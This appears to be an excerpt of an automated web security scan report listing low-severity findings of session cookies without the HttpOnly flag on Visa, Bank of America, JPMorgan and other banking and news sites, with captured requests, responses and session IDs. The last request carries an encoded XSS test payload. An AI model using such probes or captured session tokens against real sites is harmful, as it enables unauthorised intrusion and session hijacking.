Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Length: 4347
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: JSESSIONID=0001IiyhAZFqdQlmGBGG3xZ7DkA:-1042HAI; Path=/
Server: Web2
Date: Wed, 02 Feb 2011 21:59:53 GMT

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.1//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile11.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...

11.27. http://m.usa.visa.com/m/cards/travelmoney.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://m.usa.visa.com
Path:   /m/cards/travelmoney.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m/cards/travelmoney.jsp HTTP/1.1
Host: m.usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Length: 5880
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: JSESSIONID=0001n902j73dVwFGfURXqag3jk7:11K8IRU98V; Path=/
Server: Web2
Date: Wed, 02 Feb 2011 21:59:50 GMT

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.1//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile11.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...

11.28. http://m.usa.visa.com/m/discounts/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://m.usa.visa.com
Path:   /m/discounts/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m/discounts/index.jsp HTTP/1.1
Host: m.usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Length: 11577
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: JSESSIONID=0001wZ8hA8OLFPGN8J4eyN9aOQ_:-1042HAI; Path=/
Server: Web2
Date: Wed, 02 Feb 2011 21:59:58 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
...[SNIP]...

11.29. http://m.usa.visa.com/m/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://m.usa.visa.com
Path:   /m/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m/index.jsp HTTP/1.1
Host: m.usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Length: 2965
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: JSESSIONID=0001zlLQohpwqB2AM_AjTijOuAX:-1042HAI; Path=/
Server: Web2
Date: Wed, 02 Feb 2011 21:59:46 GMT

<?xml version="1.0" encoding="UTF-8" ?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml
...[SNIP]...

11.30. http://m.usa.visa.com/m/legal.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://m.usa.visa.com
Path:   /m/legal.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m/legal.jsp HTTP/1.1
Host: m.usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Length: 6444
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: JSESSIONID=0001ucYXfUVlCbmqykdFFUeFDI2:11K8IRU98V; Path=/
Server: Web2
Date: Wed, 02 Feb 2011 21:59:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<meta
...[SNIP]...

11.31. https://militarybankonline.bankofamerica.com/efs/servlet/military/login.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://militarybankonline.bankofamerica.com
Path:   /efs/servlet/military/login.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /efs/servlet/military/login.jsp HTTP/1.1
Host: militarybankonline.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:02:04 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: max-age=0, must-revalidate
Expires: 0
Set-Cookie: JSESSIONID=0000b-vSBbrptaMHzr-HBHKCPg0:13393tt7e; Path=/
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 12540


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<noscript>
<META H
...[SNIP]...

11.32. https://myaccountsaws.navyfcu.org/mfnfopwd/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://myaccountsaws.navyfcu.org
Path:   /mfnfopwd/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mfnfopwd/ HTTP/1.1
Host: myaccountsaws.navyfcu.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:02:06 GMT
Server: IBM_HTTP_Server
Content-Length: 12458
Set-Cookie: JSESSIONID=0001y-jIhHTKM6s3Y1_oSLOT9oS:15cea9hua; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US

<?xml version="1.0" encoding="ISO-8859-1" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<meta http-eq
...[SNIP]...

11.33. https://online.cardmemberservices.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://online.cardmemberservices.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: online.cardmemberservices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 18175
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=644d4c8d-b94c-4f70-9bbb-9d78f24ce9f8; domain=.cardmemberservices.com; path=/
Cache-Control: no-cache=Set-Cookie
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: v1st=6FA7CC6BF769141F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.cardmemberservices.com
Date: Wed, 02 Feb 2011 22:02:10 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta http-equiv="Pragma" content="no-cache"/
...[SNIP]...

11.34. http://online.wsj.com/article/SB10001424052748703779704576073610615364334.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://online.wsj.com
Path:   /article/SB10001424052748703779704576073610615364334.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /article/SB10001424052748703779704576073610615364334.html HTTP/1.1
Host: online.wsj.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:04:22 GMT
Server: Apache/2.0.58 (Unix)
Set-Cookie: djcs_route=2c5be191-dbef-49ce-b161-dd9949a1fa00; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:22 2021; max-age=315360000
Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com
Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:22 GMT
Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com
FastDynaPage-ServerInfo: sbkj2kapachep04 - Wed 02/02/11 - 16:54:45 EST
Cache-Control: max-age=15
Expires: Thu, 03 Feb 2011 01:04:37 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=30
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 183840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...

11.35. http://online.wsj.com/article/SB10001424052748703956604576110453371369740.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://online.wsj.com
Path:   /article/SB10001424052748703956604576110453371369740.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /article/SB10001424052748703956604576110453371369740.html HTTP/1.1
Host: online.wsj.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:04:24 GMT
Server: Apache/2.0.58 (Unix)
Set-Cookie: djcs_route=dc538be4-28ab-4562-9b58-129c8fc82f54; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:24 2021; max-age=315360000
Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com
Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:24 GMT
Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com
FastDynaPage-ServerInfo: sbkj2kapachep08 - Wed 02/02/11 - 15:46:44 EST
Cache-Control: max-age=15
Expires: Thu, 03 Feb 2011 01:04:39 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=32
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 199594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...

11.36. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://privacyassist.bankofamerica.com
Path:   /Pages/English/In_Activation.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Pages/English/In_Activation.asp HTTP/1.1
Host: privacyassist.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; ASPSESSIONIDAGCQRSRC=BFDJILIABKKFNCJMKPJHEKFE; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33016
Content-Type: text/html
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDCEBTTQTD=CBKHKLIACNGDOFLANKMCMJAE; secure; path=/
Date: Wed, 02 Feb 2011 22:45:28 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Bank of America | Privacy Assist | Sign In</title>

<meta name="description" content="The s
...[SNIP]...

11.37. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://privacyassist.bankofamerica.com
Path:   /Pages/English/In_Activation.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Pages/English/In_Activation.asp HTTP/1.1
Host: privacyassist.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33016
Content-Type: text/html
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDAGCQRSRC=FADJILIALPKBMLEBFOALEPLO; secure; path=/
Date: Wed, 02 Feb 2011 21:59:51 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Bank of America | Privacy Assist | Sign In</title>

<meta name="description" content="The s
...[SNIP]...

11.38. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://privacyassist.bankofamerica.com
Path:   /Pages/English/In_Activation.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Pages/English/In_Activation.asp HTTP/1.1
Host: privacyassist.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; ASPSESSIONIDAGCQRSRC=BFDJILIABKKFNCJMKPJHEKFE; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33016
Content-Type: text/html
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDCURDRQSB=OFLPJLIAOCPGBDIFMIHMIECE; secure; path=/
Date: Thu, 03 Feb 2011 01:05:05 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Bank of America | Privacy Assist | Sign In</title>

<meta name="description" content="The s
...[SNIP]...

11.39. http://query.jpmorgan.com/inetSearch/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://query.jpmorgan.com
Path:   /inetSearch/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inetSearch/index.jsp HTTP/1.1
Host: query.jpmorgan.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:02:18 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Set-Cookie: JSESSIONID=KFKmNJJKBh8w3T235vB2R8Qz32jnddvvJrrlLsGRnnK7nB5DNzGx!1437584885; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 18669


<HTML>
<HEAD>

<title>JPMorgan Chase: Search</title>
<style type="text/css">
A.special { text-decoration: none }
</style>


<script language="JavaScript1.2" type="text/javascript" src="include
...[SNIP]...

11.40. http://search.wachovia.com/selfservice/microsites/wachoviaSearchEntry.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://search.wachovia.com
Path:   /selfservice/microsites/wachoviaSearchEntry.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /selfservice/microsites/wachoviaSearchEntry.do HTTP/1.1
Host: search.wachovia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=686F25B2A610A0A70D54FF608686FDBA; Path=/selfservice
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Feb 2011 22:02:24 GMT
Connection: close


<html>
   
   <head>
       <title>KNOVA
   Search Results
</title>
       <meta http-equiv="content-type" content="text/html;c
...[SNIP]...

11.41. http://search.wareseeker.com/ip-board/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://search.wareseeker.com
Path:   /ip-board/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ip-board/ HTTP/1.1
Host: search.wareseeker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:24:27 GMT
Server: Apache
Set-Cookie: PHPSESSID=2p89gp55i3nje29ques3sj6a45; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type
...[SNIP]...

11.42. https://secure.opinionlab.com/ccc01/comment_card.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.opinionlab.com
Path:   /ccc01/comment_card.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ccc01/comment_card.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6067
Content-Type: text/html; Charset=UTF-8
Set-Cookie: ASPSESSIONIDCQATDDAR=FGIHILFAKFPCACOOHKFEFHBP; path=/
Date: Wed, 02 Feb 2011 22:02:31 GMT
Connection: close

<!--TEMPLATE version 3.6.1 UNIVERSAL CSS: 0--><html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<title>Comment Ca
...[SNIP]...

11.43. https://secure.opinionlab.com/rate36s.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.opinionlab.com
Path:   /rate36s.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rate36s.asp? HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQATDDAR=NGIHILFABKDPKDCHAENGBKCJ; path=/
Date: Wed, 02 Feb 2011 22:02:33 GMT
Connection: close

invalid call method

11.44. https://sitekey.bankofamerica.com/sas/resetIDScreen.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://sitekey.bankofamerica.com
Path:   /sas/resetIDScreen.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sas/resetIDScreen.do HTTP/1.1
Host: sitekey.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:02:35 GMT
Content-type: text/html
Set-Cookie: TLTSID=244C13942F18102F3BD996FBE0492B85; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=244C13942F18102F3BD996FBE0492B85; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:02:35 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-control: no-cache="set-cookie,set-cookie2"
P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Location: http://www.bankofamerica.com/state.cgi?section=gslsignin&update=yes
Content-language: en-US
Set-cookie: GSLSESSIONID=0000s0eMf9y2EnRfOFlN2C8I1eP:13k5uohoo; Path=/
Connection: close


11.45. https://sitekey.bankofamerica.com/sas/resetPasscodeScreen.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://sitekey.bankofamerica.com
Path:   /sas/resetPasscodeScreen.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sas/resetPasscodeScreen.do HTTP/1.1
Host: sitekey.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:02:35 GMT
Content-type: text/html
Set-Cookie: TLTSID=2452CCDE2F18102F3BDB96FBE0492B85; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=2452CCDE2F18102F3BDB96FBE0492B85; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:02:35 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-control: no-cache="set-cookie,set-cookie2"
P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Location: http://www.bankofamerica.com/state.cgi?section=gslsignin&update=yes
Content-language: en-US
Set-cookie: GSLSESSIONID=0000kF4ME17cVzwHT7rf0vMZses:13k5uolvs; Path=/
Connection: close


11.46. https://sitekey.bankofamerica.com/sas/signon.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://sitekey.bankofamerica.com
Path:   /sas/signon.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sas/signon.do HTTP/1.1
Host: sitekey.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:02:35 GMT
Content-type: text/html
Set-Cookie: TLTSID=2465625E2F18102F3BDD96FBE0492B85; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=2465625E2F18102F3BDD96FBE0492B85; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:02:35 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-control: no-cache="set-cookie,set-cookie2"
P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Location: http://www.bankofamerica.com/state.cgi?section=gslsignin&update=yes
Content-language: en-US
Set-cookie: GSLSESSIONID=0000xqKx0Pm6KLlxeiVVja8EmdE:13k5uoqt5; Path=/
Connection: close


11.47. http://smallbusinessonlinecommunity.bankofamerica.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://smallbusinessonlinecommunity.bankofamerica.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: smallbusinessonlinecommunity.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Wed, 02 Feb 2011 22:46:40 GMT
Server: Apache-Coyote/1.1
X-JAL: 0
Location: http://smallbusinessonlinecommunity.bankofamerica.com/index.jspa
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 0
Set-Cookie: jive.server.info="serverName=smallbusinessonlinecommunity.bankofamerica.com:serverPort=80:contextPath=:localName=bofa2-wa02.sgvmhosted.jiveland.com:localPort=9200:localAddr=127.0.0.1"; Version=1; Path=/
Set-Cookie: JSESSIONID=4356668092D99AB56CA357B2474F2FF9.; Path=/
Vary: User-Agent
X-JSL: D=651 t=1296686800162913
Connection: close
Set-Cookie: BIGipServerPool_VM138=2216458250.20480.0000; path=/


11.48. http://sofa.bankofamerica.com/eluminate  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://sofa.bankofamerica.com
Path:   /eluminate

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /eluminate?tid=1&ci=90010394&vn2=e4.0&st=1296684336309&vn1=4.2.7.1BOA&ec=utf-8&pi=AboutBAC%3AHelp%3APageNotFound%3BCF-HTTP-PageNotFound&cg=AboutBAC%3AHelp%3APageNotFound&rnd=1296688180794&ul=http%3A//www.bankofamerica.com/findit/error.cgi&pv11=%7C000302027g850000c336%7C&rf=http%3A//www.bankofamerica.com/vehicle_and_personal_loans544ce%2522%253E%253Cscript%253Ealert%281%29%253C/script%253E45ae18a6011/index.cfm HTTP/1.1
Host: sofa.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/findit/error.cgi
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
